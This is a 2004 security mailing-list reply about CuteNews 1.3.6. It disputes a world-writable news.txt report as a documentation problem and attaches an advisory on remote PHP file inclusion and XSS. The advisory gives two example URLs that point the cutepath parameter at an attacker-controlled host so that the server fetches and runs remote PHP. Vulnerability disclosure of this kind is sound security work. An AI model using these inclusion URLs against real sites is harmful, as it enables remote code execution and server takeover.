RE: CuteNews News.txt writable to world
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Sunday 29 August 2004 10:39, e0r wrote:
> Date: August 29, 2004
> Vender: http://www.cutephp.com/
> Program: CuteNews
> Versions affected: => 1.3.6
> Bug: CuteNews News.txt writable to world
> Type:
> Author: e0r
> www: http://www.rootthief.com/
> team: !Sui-Generes (!Sui)
> Email: homicidal @ gmail . com
> -----------------------------
This is not realy a code vulnerability, the problem is in the documentation
where you can read:
"Now You must CHMOD the the directory cutenews/data/ and all files and
folders under the data/ directory must be also chmod'ed to 777"
You can do that without 777 permisions using some alternative methods;
setting directory group as apache user, or using apache suexec.
However CuteNews have some AUTHENTIC vulnerabilities.
- --
- -----------------------------------------------------------------------
Albert Puigsech Galicia
http://www.7a69ezine.org/~apuigsech
- -----------------------------------------------------------------------
Este e-mail puede contener información confidencial y/o privilegiada.
Si el presente mensaje no va dirigido a su persona (o lo ha recibido
por error) por favor, notifíquelo inmediatamente al emisor y destruya
este e-mail. Cualquier divulgación, copia o distribución no autorizada
del material contenido en este e-mail queda prohibida.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFBM670iLW5f5WBvGcRAqfiAJ9z/EuWShz9Zby5/HDznKN+jZk4zQCfRKqn
QDNQZX3iHoXV1U6DVx+NAkQ=
=yogr
-----END PGP SIGNATURE-----
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#14
- ------------------------------------------------------------------
http://www.7a69ezine.org
- ------------------------------------------------------------------
Title: CuteNews multiple vulnerabilities
Author: Albert Puigsech Galicia - <ripe@xxxxxxxxxxxxx>
Software: CuteNews
Versions: => 1.3.6
Remote: yes
Exploit: yes
Severity: High
- ------------------------------------------------------------------
I. Introduction
CuteNews is a simple news management system that suports coments, archives,
avatars, backups, and other issues. It's easy to install beause doesn't need
any database backend. You can get more informatión and download it from;
http://cutephp.com/cutenews/
II. Description
There are multiple well know php include vulnerabilities that can allow
remote users to execute php code with http server privileges. There are also
some XSS vulnerabilities.
III. Exploit
You can modify some php require() calls to execute remote php files located,
for example, on your own http server.
- This will rexecute 'http://remote/data/config.php':
http://vulnerable/show_archives.php?cutepath=http://remote/
http://vulnerable/show_news.php?cutepath=http://remote/
IV. Patch
Not Yet.
V. Timeline
No timeline
VI. Extra data
For spanish information you can visit Advisories section on 7a69ezine
website:
http://www.7a69ezine.org/avisos/propios
- --
- -----------------------------------------------------------------------
Albert Puigsech Galicia
http://www.7a69ezine.org/~apuigsech
- -----------------------------------------------------------------------
Este e-mail puede contener información confidencial y/o privilegiada.
Si el presente mensaje no va dirigido a su persona (o lo ha recibido
por error) por favor, notifíquelo inmediatamente al emisor y destruya
este e-mail. Cualquier divulgación, copia o distribución no autorizada
del material contenido en este e-mail queda prohibida.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFBM65riLW5f5WBvGcRAoUEAJ9QI4ADFqKMLEMDCxbzAR9c94O3QgCfSc4D
kauk5bXjk+cYidR1aupRqYI=
=XNEe
-----END PGP SIGNATURE-----
--- End Message ---